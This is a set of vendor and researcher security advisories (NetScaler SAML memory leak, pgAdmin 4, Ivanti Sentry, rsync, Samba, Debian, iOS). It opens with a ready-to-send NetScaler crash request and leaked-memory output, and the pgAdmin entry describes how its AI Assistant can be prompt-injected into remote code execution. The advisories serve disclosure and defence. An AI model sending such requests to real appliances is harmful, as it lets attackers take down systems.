..
Leaked bytes:
00000000  f0 0d 90 de de de de de de de de de de de de de   |................|
00000010  de de de de de de de de de de de de de de de de   |................|
00000020  de de de de de de de de de de de de de de de de   |................|
00000030  de de de de de de de de de de de de de de de de   |................|
00000040  de de de de de de de de de de de de de de ed a7   |................|
00000050  0c a1 35 00                                       |..5.|
..

There’s clearly data leaking here (0xf00d!) and, interestingly, what appears to be a data pointer (0xa10ca7ed).

We can't say with certainty what this pointer references, but it certainly looks plausible. If it is a valid process pointer, then this bug graduates from a simple information disclosure to a genuine infoleak primitive. Paired with a suitable memory corruption vulnerability, it could be exactly the kind of building block needed for a full device compromise.

Of course, if you're more interested in demonstrating impact than building exploit chains, there is a much easier route, as naturally in enterprise-grade security appliances, requests as simple as the following are enough to reliably crash the target system:

<samlp:AuthnRequest ID=

POST /saml/login HTTP/1.1
Host: 192.168.80.125
Content-Length: 46

SAMLRequest=PHNhbWxwOkF1dGhuUmVxdWVzdCBJRD0%3D

This request causes the nsppe process to "crash out":

Detection Artefact Generator

As always, we’re here to share our Detection Artefact Generator to determine your own susceptibility and inform remediation in your own environments. It can be found on our GitHub here.

c:\>python watchTowr-vs-Netscaler-CVE-2026-8451.py https://all-ur-boxen.com
..
Leaked bytes:
00000000  f0 0d 90 de de de de de de de de de de de de de   |................|
00000010  de de de de de de de de de de de de de de de de   |................|
00000020  de de de de de de de de de de de de de de de de   |................|
00000030  de de de de de de de de de de de de de de de de   |................|
00000040  de de de de de de de de de de de de de de ed a7   |................|
00000050  0c a1 35 00                                       |..5.|
..
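A log-side check for the malformation all of the requests above share, as an added example (not watchTowr's Detection Artefact Generator and not NetScaler code): it URL- and base64-decodes a SAMLRequest form value and reports every attribute whose value is unquoted or never closed, which well-formed XML never contains. The function names and the 4 KiB buffers are assumptions.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Percent-decode a form value (SAMLRequest arrives URL-encoded); returns bytes written. */
static size_t url_decode(const char *in, char *out, size_t cap) {
    size_t n = 0;
    for (size_t i = 0; in[i] != '\0' && n < cap; i++) {
        if (in[i] == '%' && isxdigit((unsigned char)in[i + 1]) && isxdigit((unsigned char)in[i + 2])) {
            char hex[3] = { in[i + 1], in[i + 2], '\0' };
            out[n++] = (char)strtol(hex, NULL, 16);
            i += 2;
        } else {
            out[n++] = (in[i] == '+') ? ' ' : in[i];
        }
    }
    return n;
}

static int b64val(int c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    return c == '+' ? 62 : c == '/' ? 63 : -1;
}

/* Minimal base64 decoder: padding and any non-alphabet byte are skipped. */
static size_t b64_decode(const char *in, size_t inlen, unsigned char *out, size_t cap) {
    uint32_t acc = 0;
    int bits = 0;
    size_t n = 0;
    for (size_t i = 0; i < inlen; i++) {
        int v = b64val((unsigned char)in[i]);
        if (v < 0) continue;
        acc = (acc << 6) | (uint32_t)v;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n < cap) out[n++] = (unsigned char)(acc >> bits);
            acc &= (1u << bits) - 1;
        }
    }
    return n;
}

static int is_name_char(unsigned char c) {
    return isalnum(c) || c == ':' || c == '_' || c == '-' || c == '.';
}

/* Report every `name=` that is not followed by a quoted, closed value. Well-formed
 * XML never carries a bare or unterminated attribute value, so each hit is exactly
 * the shape the NetScaler parser mishandles (an '=' inside element text is reported
 * too; that errs on the side of caution). Returns the hit count and copies the
 * first offending name into attr when a buffer is supplied. */
int find_unterminated_attrs(const unsigned char *xml, size_t len, char *attr, size_t attrcap) {
    int hits = 0;
    for (size_t i = 0; i < len; i++) {
        if (xml[i] != '=') continue;
        size_t s = i;
        while (s > 0 && is_name_char(xml[s - 1])) s--;
        if (s == i) continue;                             /* '=' with no name before it */
        size_t j = i + 1;
        while (j < len && isspace(xml[j])) j++;
        int bad = 1;
        if (j < len && (xml[j] == '"' || xml[j] == '\'')) {
            size_t k = j + 1;
            while (k < len && xml[k] != xml[j]) k++;
            if (k < len) { bad = 0; i = k; }              /* closed: skip over the whole value */
        }
        if (bad && hits++ == 0 && attr && attrcap) {
            size_t n = i - s < attrcap ? i - s : attrcap - 1;
            memcpy(attr, xml + s, n);
            attr[n] = '\0';
        }
    }
    return hits;
}

/* The full pipeline over a raw SAMLRequest form value as found in a request log.
 * Returns the hit count, or -1 when nothing decodes. */
int check_saml_request(const char *form_value, char *attr, size_t attrcap) {
    char b64[4096];
    unsigned char xml[4096];
    size_t blen = url_decode(form_value, b64, sizeof b64);
    size_t xlen = b64_decode(b64, blen, xml, sizeof xml);
    if (xlen == 0) return -1;
    return find_unterminated_attrs(xml, xlen, attr, attrcap);
}

/* Helpers for NUL-terminated XML text: hit count, and the first offending name ("" if none). */
int count_unterminated(const char *xml) {
    return find_unterminated_attrs((const unsigned char *)xml, strlen(xml), NULL, 0);
}
const char *first_unterminated(const char *xml) {
    static char attr[64];
    attr[0] = '\0';
    find_unterminated_attrs((const unsigned char *)xml, strlen(xml), attr, sizeof attr);
    return attr;
}
```

Fed the page's crash request value PHNhbWxwOkF1dGhuUmVxdWVzdCBJRD0%3D, check_saml_request() reports one hit on ID; the baseline AuthnRequest shown earlier reports none.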

Thanks, PolyMarket

We get to eat tonight!

Timeline

  • 28th March 2026: watchTowr discovers issue, notifies Citrix and affected clients
  • 28th March 2026: Citrix responds with what appears to be an automatic reply
  • 30th April 2026: watchTowr requests update from Citrix
  • 7th May 2026: watchTowr again requests update from Citrix
  • 7th May 2026: Citrix advises that a fix is being developed
  • 14th June 2026: Citrix advises they expect to publish on 29th June
  • 25th June 2026: Citrix advises that a fix may be delayed by ‘a few days’; watchTowr responds that this is acceptable
  • 30th June 2026: Citrix publishes advisory and patches
  • 30th June 2026: watchTowr publishes research, and memes

The research published by watchTowr Labs is powered by the same engine behind the watchTowr Platform, our Preemptive Exposure Management solution built for enterprises that refuse to wait for the next satisfying advisory from their scanner vendor.

The watchTowr Platform combines External Attack Surface Management and Continuous Automated Red Teaming to test your defenses against the vulnerabilities and techniques that matter: the ones real attackers are actually exploiting.



Related vulnerabilities: CVE-2025-12101, CVE-2026-3055, CVE-2026-0050, CVE-2025-5777, CVE-2026-8451

WARNING: Remote Code Execution and Cross-Site Scripting in pgAdmin 4 Can Be Exploited to Execute Arbitrary Commands and Exfiltrate Database Credentials. Patch Immediately! | CCB Belgium

Reference: https://ccb.belgium.be/advisories/warning-remote-code-execution-and-cross-site-scripting-pgadmin-4-can-be-exploited

Published: 22/06/2026

> * Last update: 22/06/2026
> * Affected software: pgAdmin 4 prior to version 9.16
> * Type:
> → CWE-306: Missing Authentication for Critical Function / CWE-502: Deserialization of Untrusted Data
> → CWE-285: Improper Authorization
> → CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-Site Scripting')
> * CVE/CVSS
> → CVE-2026-12048: CVSS 9.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N)
> → CVE-2026-12046: CVSS 9.0 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)
> → CVE-2026-12045: CVSS 9.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)

Sources

pgAdmin - https://www.pgadmin.org/docs/pgadmin4/9.16/release_notes_9_16.html

Risks

pgAdmin 4 is the leading open-source graphical administration and management tool for PostgreSQL databases, widely used by database administrators in both server and desktop deployments.

If exploited, these vulnerabilities could allow attackers to execute arbitrary commands on the underlying server, gain unauthorized access to the database management interface without valid credentials, or inject malicious scripts that steal saved database credentials and issue SQL queries against every connected server. Successful exploitation may result in unauthorized access to sensitive database information (Confidentiality), unauthorized modification or deletion of database content (Integrity), or disruption of database management services (Availability).

Description

CVE-2026-12048 is a stored cross-site scripting vulnerability where PostgreSQL server error text and Explain plan-node content were passed unsanitized through html-react-parser across multiple UI components, including notifier toasts, form errors, modal alerts, and the Explain visualiser. Because pgAdmin's default Content-Security-Policy allows inline scripts, injected JavaScript runs same-origin to the victim's authenticated session and can read every saved server connection credential and issue arbitrary SQL against every server the victim is connected to.

CVE-2026-12046 affects two SQL Editor endpoints (close and update_connection) that were missing the authentication decorator (@pga_login_required) in server mode. This made the endpoints reachable by unauthenticated attackers and exposed a pickle deserialization sink, enabling remote code execution without prior authentication.

CVE-2026-12045 affects the AI Assistant feature. A read-only transaction bypass allowed prompt-injected multi-statement payloads to commit write operations outside the READ ONLY transaction wrapper. On superuser database connections, this flaw chains to remote code execution via the “COPY ... TO PROGRAM” PostgreSQL command.

Recommended Actions

Patch
The Centre for Cybersecurity Belgium strongly recommends installing updates for vulnerable devices with the highest priority after thorough testing.

Monitor/Detect
The CCB recommends organizations upscale monitoring and detection capabilities to identify any related suspicious activity and ensure a swift response in case of an intrusion.

In case of an intrusion, you can report an incident via https://ccb.belgium.be/en/cert/report-incident.

While patching appliances or software to the newest version may protect against future exploitation, it does not remediate historic compromise.

References

NVD - https://nvd.nist.gov/vuln/detail/CVE-2026-12048
NVD - https://nvd.nist.gov/vuln/detail/CVE-2026-12045
NVD - https://nvd.nist.gov/vuln/detail/CVE-2026-12046


Related vulnerabilities: CVE-2026-12046, CVE-2026-12045, CVE-2026-12048

CVE-2026-10520
  Description: An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to achieve root-level remote code execution
  CVSS Score (Severity): 10 (Critical)
  CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  CWE: CWE-78

CVE-2026-10523
  Description: An Authentication Bypass vulnerability (CWE-288) in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated attacker to create arbitrary administrative accounts and obtain full administrative access
  CVSS Score (Severity): 9.9 (Critical)
  CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  CWE: CWE-288

Ref: https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523?language=en_US


Related vulnerabilities: CVE-2026-10520, CVE-2026-10523

NEWS for rsync 3.4.3 (20 May 2026)

Changes in this version:

SECURITY FIXES:

Six CVEs are fixed in this release. All six are assigned by VulnCheck as CNA. Affected versions are 3.4.2 and earlier in every case. Three of the six (CVE-2026-29518, CVE-2026-43617, CVE-2026-43619) require non-default daemon configuration to reach: the first and third need "use chroot = no" for a module, the second needs "daemon chroot = ..." set in rsyncd.conf. Two (CVE-2026-43618, CVE-2026-43620) are reachable from a normal pull or a normal authenticated daemon connection. The sixth (CVE-2026-45232) is reachable only when RSYNC_PROXY is set and the proxy (or a MITM) returns a pathological response. Many thanks to the external researchers who reported these issues.

CVE-2026-29518 (CVSS v4.0 7.3, HIGH): TOCTOU symlink race condition allowing local privilege escalation in daemon mode without chroot. An rsync daemon configured with "use chroot = no" was exposed to a time-of-check / time-of-use race on parent path components: a local attacker with write access to a module could replace a parent directory component with a symlink between the receiver's check and its open(), redirecting reads (basis-file disclosure) and writes (file overwrite) outside the module. Default "use chroot = yes" is not exposed. secure_relative_open() (added in 3.4.0 for CVE-2024-12086) was previously unused in the daemon-no-chroot case; the fix enables it there and reroutes the sender's read-path opens through it. Reported by Nullx3D (Batuhan Sancak), Damien Neil and Michael Stapelberg.

CVE-2026-43617 (CVSS v3.1 4.8, MEDIUM): Hostname/ACL bypass on an rsync daemon configured with daemon chroot = /X in rsyncd.conf when the chroot tree lacks DNS resolution support. The reverse-DNS lookup of the connecting client was performed after the daemon chroot had been entered; if /X did not contain the libc resolver fixtures (/etc/resolv.conf, /etc/nsswitch.conf, /etc/hosts, NSS service modules) the lookup failed and the connecting hostname was set to "UNKNOWN", causing hostname-based deny rules to silently fail open. IP-based ACLs are unaffected. The per-module use chroot setting is unrelated to this issue. The fix performs the lookup before entering the daemon chroot. Reported by MegaManSec.

CVE-2026-43618 (CVSS v3.1 8.1, HIGH): Integer overflow in the compressed-token decoder enabling remote memory disclosure to an authenticated daemon peer. The receiver accumulated a 32-bit signed counter without overflow checking; a malicious sender could trigger an overflow that, with careful manipulation, leaked process memory contents to the attacker -- environment variables, passwords, heap and library pointers -- significantly weakening ASLR. The fix bounds the counter and adds wire-input validation in several adjacent places (defence-in-depth). Workaround for older releases: refuse options = compress in rsyncd.conf. Reported by Omar Elsayed.

CVE-2026-43619 (CVSS v3.1 6.3, MEDIUM): Symlink races on path-based system calls in "use chroot = no" daemon mode (generalisation of CVE-2026-29518). Earlier fixes for symlink races on the receiver's open() call missed the same race class on every other path-based system call: chmod, lchown, utimes, rename, unlink, mkdir, symlink, mknod, link, rmdir and lstat. The fix routes each affected path-based syscall through a parent dirfd opened under RESOLVE_BENEATH-equivalent kernel-enforced confinement (openat2 on Linux 5.6+, O_RESOLVE_BENEATH on FreeBSD 13+ and macOS 15+, per-component O_NOFOLLOW walk elsewhere). Default "use chroot = yes" is not exposed. Reported by Andrew Tridgell as a follow-on audit of CVE-2026-29518.

CVE-2026-43620 (CVSS v3.1 6.5, MEDIUM): Out-of-bounds read in the receiver's recv_files() enabling remote denial-of-service of any client pulling from a malicious server (incomplete fix of commit 797e17f). The earlier parent_ndx<0 guard added to send_files() was not applied to the visually-identical block in recv_files(). A malicious rsync server can drive any connecting client into a deterministic SIGSEGV by setting CF_INC_RECURSE in the compatibility flags and sending a crafted file list and transfer record. inc_recurse is the protocol-30+ default, so no special options are required on the victim. Workaround for older releases: --no-inc-recursive on the client. Reported by Pratham Gupta.

CVE-2026-45232 (CVSS v3.1 3.1, LOW): Off-by-one out-of-bounds stack write in the rsync client's HTTP CONNECT proxy handler (establish_proxy_connection() in socket.c). After issuing the CONNECT request, rsync read the proxy's first response line one byte at a time into a 1024-byte stack buffer with the bound cp < &buffer[sizeof buffer - 1]. If the proxy (or a MITM in front of it) returned 1023+ bytes on that first line without a newline terminator, cp exited the loop pointing at a buffer slot the loop never wrote, leaving *cp holding stale stack data from the earlier snprintf() of the outgoing CONNECT request. The post-loop logic then wrote a single \0 one byte past the end of the buffer on the stack. Reach is client-side only, and only when RSYNC_PROXY is set so rsync tunnels an rsync:// connection through an HTTP CONNECT proxy. The written byte is always \0 and the offset is fixed by the buffer size, not attacker-chosen, so this is not an arbitrary-write primitive: practical impact is corruption of one adjacent stack byte and possible later misbehaviour or crash. The fix detects the "buffer filled without finding \n" case explicitly by position and refuses the response with "proxy response line too long". Reported by Aisle Research via Michal Ruprich (rsync-3.4.1-2.el10 QE).
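As an added illustration of the fix shape described for CVE-2026-45232 (a constructed example, not rsync's code): a byte-at-a-time line reader that reserves the last buffer slot for the terminator and decides "buffer filled without finding \n" by position, never by inspecting the byte under the cursor. The in-memory byte_source stream and the probe_line / probe_unterminated helpers are assumptions made for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Status codes returned by read_response_line(). */
enum line_status { LINE_OK = 0, LINE_EOF = -1, LINE_TOO_LONG = -2 };

/* Constructed stand-in for the proxy socket: an in-memory byte stream
 * drained one byte at a time, as the advisory describes the client reading
 * the proxy's first response line. Not rsync's code. */
struct byte_source {
    const char *data;
    size_t len;
    size_t pos;
};

static int source_read_byte(struct byte_source *src, char *out)
{
    if (src->pos >= src->len)
        return 0;               /* peer closed before a newline arrived */
    *out = src->data[src->pos++];
    return 1;
}

/* Read one response line into buffer[0..bufsize-1], stopping at '\n' (a
 * '\r' is tolerated and not stored). The last slot is reserved for the NUL,
 * so the loop never writes buffer[bufsize-1] and the terminator only lands
 * at an index the loop itself bounded. If the buffer fills before a newline
 * is seen (a line of bufsize-1 or more payload bytes), that is detected by
 * the value of n alone and the line is refused. */
static enum line_status read_response_line(struct byte_source *src,
                                           char *buffer, size_t bufsize)
{
    size_t n = 0;
    char ch;

    if (bufsize == 0)
        return LINE_TOO_LONG;

    while (n < bufsize - 1) {
        if (!source_read_byte(src, &ch)) {
            buffer[0] = '\0';
            return LINE_EOF;
        }
        if (ch == '\n') {
            buffer[n] = '\0';   /* n <= bufsize - 2: always inside the buffer */
            return LINE_OK;
        }
        if (ch == '\r')
            continue;
        buffer[n++] = ch;
    }

    /* Loop ended because n reached bufsize - 1, not because '\n' was seen. */
    buffer[0] = '\0';
    return LINE_TOO_LONG;
}

/* Helper (assumption): feed constructed response `text` through a buffer of
 * `bufsize` bytes (capped at 1024, the size named in the advisory) and return
 * the status; the parsed line is copied to `out` when one is supplied. */
static int probe_line(const char *text, size_t bufsize,
                      char *out, size_t outsize)
{
    char buffer[1024];
    struct byte_source src = { text, strlen(text), 0 };
    enum line_status rc;

    if (bufsize > sizeof buffer)
        bufsize = sizeof buffer;
    rc = read_response_line(&src, buffer, bufsize);
    if (out && outsize)
        snprintf(out, outsize, "%s", buffer);
    return rc;
}

/* Helper (assumption) for the advisory's trigger shape: `count` bytes with
 * no newline at all, read through the full 1024-byte buffer. */
static int probe_unterminated(size_t count)
{
    static char text[4096];
    if (count >= sizeof text)
        count = sizeof text - 1;
    memset(text, 'A', count);
    text[count] = '\0';
    return probe_line(text, 1024, NULL, 0);
}

int main(void)
{
    char line[64];
    int rc = probe_line("HTTP/1.1 200 Connection established\r\n", 1024,
                        line, sizeof line);
    printf("status %d line '%s'\n", rc, line);
    printf("1022 bytes, no newline: %d\n", probe_unterminated(1022));
    printf("1023 bytes, no newline: %d\n", probe_unterminated(1023));
    return 0;
}
```

With the 1024-byte buffer, 1022 unterminated bytes simply hit end-of-stream, while 1023 bytes without a newline is the case the advisory describes and is refused by position.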

In addition to the six CVE fixes, this release adds defence-in-depth hardening on several adjacent paths: bounded wire-supplied counts and lengths in flist/io/acls/xattrs, a guard against length underflow in cumulative snprintf() callers, a parent block-index bounds check on the receiver, a NULL check in read_delay_line(), a lower ceiling on MAX_WIRE_DEL_STAT to avoid signed-int overflow in the read_del_stats() accumulator, rejection of hyphen-prefixed remote-shell hostnames (defence-in-depth against argv-injection in tooling that forwards untrusted input into the hostspec position; reported by Aisle Research via Michal Ruprich), and a NULL-check on localtime_r() in timestring() to keep a malicious server from crashing the client by advertising a file with an out-of-range modtime.

BUG FIXES:

Fixed a regression introduced by the 3.4.0 secure_relative_open() CVE fix where legitimate directory symlinks on the receiver side (e.g. when using -K / --copy-dirlinks) caused "failed verification -- update discarded" errors on delta transfers. The old code rejected every symlink in the path with a per-component O_NOFOLLOW walk; the receiver now uses kernel-enforced "stay below dirfd" path resolution where available. Fixes #715.

PORTABILITY / BUILD:

secure_relative_open() now uses openat2(RESOLVE_BENEATH | RESOLVE_NO_MAGICLINKS) on Linux 5.6+, and openat() with O_RESOLVE_BENEATH on FreeBSD 13+ and macOS 15+ (Sequoia) / iOS 18+. The kernel rejects ".." escapes, absolute symlinks, and symlinks whose target lies outside the starting directory, while still following symlinks that resolve within it -- the same trade-off that fixes the issue #715 regression without weakening the original CVE protection. Other platforms (Solaris, OpenBSD, NetBSD, Cygwin) retain the previous per-component O_NOFOLLOW walk; on those platforms the issue #715 regression remains visible.

testsuite/xattrs: ignore SUNWattr_* in the Solaris xls helper.

DEVELOPER RELATED:

Added testsuite/symlink-dirlink-basis.test (taken from PR #864 by Samuel Henrique) covering the issue #715 regression and several edge cases (--backup, --inplace, --partial-dir with protocol < 29, top-level files). The test skips on platforms without a RESOLVE_BENEATH equivalent.

Added regression tests for the new security fixes: chmod-symlink-race.test, chdir-symlink-race.test, bare-do-open-symlink-race.test, alt-dest-symlink-race.test, copy-dest-source-symlink.test, sender-flist-symlink-leak.test, secure-relpath-validation.test, daemon-chroot-acl.test and daemon-refuse-compress.test. The symlink-race tests skip on Cygwin, Solaris, OpenBSD and NetBSD (no RESOLVE_BENEATH equivalent on those platforms).

runtests.py now errors early with a clear message when any of the test helper programs (tls, trimslash, t_unsafe, t_chmod_secure, t_secure_relpath, wildtest, getgroups, getfsdev) are missing, instead of letting many tests fail with confusing "not found" errors.

Added OpenBSD and NetBSD CI jobs that run make check on those platforms.

Added Ubuntu 22.04 and AlmaLinux 8 CI workflows so future backports to the two mainstream LTS families build and test on the same CI surface as trunk.

testsuite/protected-regular.test now runs unprivileged via unshare with user-namespace UID mapping, falling back to skip if unshare/uidmap is not available; previously it required real root.

Added symlink-dirlink-basis to the Cygwin CI's expected-skipped list.

Removed the old release system (replaced by the new release script in 3.4.2).


Related vulnerabilities: CVE-2026-43620, CVE-2026-29518, CVE-2024-12086, CVE-2026-43618, CVE-2026-45232, CVE-2026-43617, CVE-2026-43619

===========================================================
== Subject:     Unauthenticated Remote Code Execution
==              in Samba printing subsystem
==
== CVE ID#:     CVE-2026-4480
==
== Versions:    All versions
==
== Summary:     Samba print servers with a "print command"
==              that has the %J substitution character
==              are vulnerable to a Remote Code Execution
===========================================================

===========
Description
===========

Samba passes the client-controlled job description string to the command configured with the "print command" setting via the "%J" substitution character without escaping shell meta characters. This leads to a remote code execution vulnerability.

Print servers configured with "printing = cups" or "printing = iprint", and print servers that do not have the %J substitution character in the "print command" setting are not affected.

The problem is much less dangerous if %J has single quotes directly around it, e.g. '%J', but it's still possible to inject command line options.

By default, print servers allow guest users to print.

==================
Patch Availability
==================

Patches addressing this issue have been posted to:

https://www.samba.org/samba/security/

Additionally, Samba $VERSIONS have been issued as security releases to correct the defect. Samba administrators are advised to upgrade to these releases or apply the patch as soon as possible.

==================
CVSSv3 calculation
==================

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 10.0

==========
Workaround
==========

Adding single quotes (directly!) around %J (=> '%J') makes it much less likely an attacker can do something useful. Note using double quotes may not be enough.

If unsure remove %J completely from the "print command" smb.conf entry.

=======
Credits
=======

Originally reported by:
- Ron Ben Yizhak with SafeBreach
- John Walker with ZeroPath
- Arjun Basnet with Securin Labs

Patches provided by:
- Stefan Metzmacher of Sernet and the Samba team.
- Douglas Bagnall of Catalyst and the Samba team.

This advisory by Volker Lendecke and Stefan Metzmacher of Sernet and the Samba team.

==========================================================
== Our Code, Our Bugs, Our Responsibility.
== The Samba Team
==========================================================


Related vulnerabilities: CVE-2026-4480

Package: samba
CVE ID: CVE-2026-1933 CVE-2026-2340 CVE-2026-3012 CVE-2026-3238 CVE-2026-4408 CVE-2026-4480

Several vulnerabilities have been discovered in Samba, an SMB/CIFS file, print, and login server for Unix, which might result in bypass of access checks, overwrite of files in unintended situations using the WORM vfs module, installing CA certificates over http without verification when auto-enrollment GPO is enabled, denial of service or remote code execution.

For the oldstable distribution (bookworm), these problems have been fixed in version 2:4.17.12+dfsg-0+deb12u4.

For the stable distribution (trixie), these problems have been fixed in version 2:4.22.8+dfsg-0+deb13u2.

We recommend that you upgrade your samba packages.

For the detailed security status of samba please refer to its security tracker page at: https://security-tracker.debian.org/tracker/samba

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org


Related vulnerabilities: CVE-2026-1933, CVE-2026-2340, CVE-2026-4480, CVE-2026-4408, CVE-2026-3238, CVE-2026-3012

About the security content of iOS 26.5 and iPadOS 26.5 - Apple Support

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security releases page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

Released May 11, 2026

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause a denial-of-service

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2026-28991: Seiji Sakurai (@HeapSmasher)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass certain Privacy preferences

Description: A permissions issue was addressed with additional restrictions.

CVE-2026-28988: Asaf Cohen

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause unexpected system termination

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2026-28959: Dave G.

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: A malicious app may be able to break out of its sandbox

Description: A logic issue was addressed with improved restrictions.

CVE-2026-28995: Vamshi Paili, Tony Gorez (@tonygo_) for Reverse Society

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted image may lead to a denial-of-service

Description: This is a vulnerability in open source code and Apple Software is among the affected projects. The CVE-ID was assigned by a third party. Learn more about the issue and CVE-ID at cve.org.

CVE-2026-1837

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory

Description: A memory corruption issue was addressed with improved input validation.

CVE-2026-28956: impost0r (ret2plt)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing an audio stream in a maliciously crafted media file may terminate the process

Description: The issue was addressed with improved memory handling.

CVE-2026-39869: David Ige of Beryllium Security

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: An inconsistent user interface issue was addressed with improved state management.

CVE-2026-28964: Alan Wang, Christopher W. Fletcher, Hovav Shacham, David Kohlbrenner, Riccardo Paccagnella

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted file may lead to unexpected app termination

Description: The issue was addressed with improved checks.

CVE-2026-28936: Andreas Jaegersberger & Ro Achterberg of Nosebeard Labs

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Parsing a maliciously crafted file may lead to an unexpected app termination

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2026-28918: Niels Hofmans, Anonymous working with TrendAI Zero Day Initiative

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to access sensitive user data

Description: A race condition was addressed with additional validation.

CVE-2026-43659: Alex Radocea

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted image may corrupt process memory

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2026-43661: an anonymous researcher

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted file may lead to unexpected app termination

Description: The issue was addressed with improved bounds checks.

CVE-2026-28977: Suresh Sundaram

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: Processing a maliciously crafted image may corrupt process memory

Description: The issue was addressed with improved memory handling.

CVE-2026-28990: Jiri Ha, Arni Hardarson

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An attacker may be able to cause unexpected app termination

Description: A memory corruption vulnerability was addressed with improved locking.

CVE-2026-28992: Johnny Franks (@zeroxjf)

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to determine kernel memory layout

Description: A logging issue was addressed with improved data redaction.

CVE-2026-28943: Google Threat Analysis Group

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause unexpected system termination

Description: A use after free issue was addressed with improved memory management.

CVE-2026-28969: Mihalis Haatainen, Ari Hawking, Ashish Kunwar

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to cause unexpected system termination or read kernel memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2026-43655: Somair Ansar and an anonymous researcher

Available for: iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to disclose kernel memory

Description: The issue was addressed with improved memory handling.

